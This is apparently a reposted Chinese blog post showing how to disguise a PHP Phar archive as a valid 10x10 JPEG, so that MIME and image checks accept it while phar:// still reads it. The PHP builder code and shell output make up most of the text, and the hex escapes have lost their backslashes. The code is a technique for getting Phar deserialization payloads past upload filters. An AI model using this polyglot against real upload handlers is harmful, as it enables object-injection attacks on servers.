如何将Phar文件包转化成图像从而绕过文件类型检测

在花了太多时间来讨论JPEG规范和阅读PHP源代码后，我认为我可以简单的使用GIMP创建10×10黑色图像并嵌入其中。

<?phpclass TestObject {} 
 
$jpeg_header_size =  
"xffxd8xffxe0x00x10x4ax46x49x46x00x01x01x01x00x48x00x48x00x00xffxfex00x13"."x43x72x65x61x74x65x64x20x77x69x74x68x20x47x49x4dx50xffxdbx00x43x00x03x02"."x02x03x02x02x03x03x03x03x04x03x03x04x05x08x05x05x04x04x05x0ax07x07x06x08x0cx0ax0cx0cx0bx0ax0bx0bx0dx0ex12x10x0dx0ex11x0ex0bx0bx10x16x10x11x13x14x15x15"."x15x0cx0fx17x18x16x14x18x12x14x15x14xffxdbx00x43x01x03x04x04x05x04x05x09x05x05x09x14x0dx0bx0dx14x14x14x14x14x14x14x14x14x14x14x14x14x14x14x14x14x14x14"."x14x14x14x14x14x14x14x14x14x14x14x14x14x14x14x14x14x14x14x14x14x14x14x14x14x14x14x14x14x14x14xffxc2x00x11x08x00x0ax00x0ax03x01x11x00x02x11x01x03x11x01"."xffxc4x00x15x00x01x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x08xffxc4x00x14x01x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00xffxdax00x0cx03"."x01x00x02x10x03x10x00x00x01x95x00x07xffxc4x00x14x10x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x20xffxdax00x08x01x01x00x01x05x02x1fxffxc4x00x14x11"."x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x20xffxdax00x08x01x03x01x01x3fx01x1fxffxc4x00x14x11x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x20"."xffxdax00x08x01x02x01x01x3fx01x1fxffxc4x00x14x10x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x20xffxdax00x08x01x01x00x06x3fx02x1fxffxc4x00x14x10x01"."x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x20xffxdax00x08x01x01x00x01x3fx21x1fxffxdax00x0cx03x01x00x02x00x03x00x00x00x10x92x4fxffxc4x00x14x11x01x00"."x00x00x00x00x00x00x00x00x00x00x00x00x00x00x20xffxdax00x08x01x03x01x01x3fx10x1fxffxc4x00x14x11x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x20xffxda"."x00x08x01x02x01x01x3fx10x1fxffxc4x00x14x10x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x20xffxdax00x08x01x01x00x01x3fx10x1fxffxd9"; 
 
$phar = new Phar("phar.phar"); 
$phar->startBuffering(); 
$phar->addFromString("test.txt","test"); 
$phar->setStub($jpeg_header_size." __HALT_COMPILER(); ?>"); 
$o = new TestObject(); 
$phar->setMetadata($o); 
$phar->stopBuffering(); 

现在，检查以下我的思考成果。

tampe125@AlphaCentauri:~$ file phar.jpeg  
phar.jpeg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, comment: "Created with GIMP", progressive, precision 8, 10x10, frames 3tampe125@AlphaCentauri:~$ php -a 
php > var_dump(mime_content_type('phar.jpeg')); 
php shell code:1:string(10) "image/jpeg"php > var_dump(file_exists('phar://phar.jpeg/test.txt')); 
php shell code:1:bool(true) 
php > var_dump(getimagesize('phar.jpeg')); 
php shell code:1: 
array(7) { 
  [0] =>  int(10) 
  [1] =>  int(10) 
  [2] =>  int(2) 
  [3] =>  string(22) "width="10" height="10"" 
  'bits' =>  int(8)  'channels' =>  int(3)  'mime' =>  string(10) "image/jpeg"} 

（编辑：核心网）

【声明】本站内容均来自网络，其相关言论仅代表作者个人观点，不代表本站立场。若无意侵犯到您的权利，请及时与联系站长删除相关内容!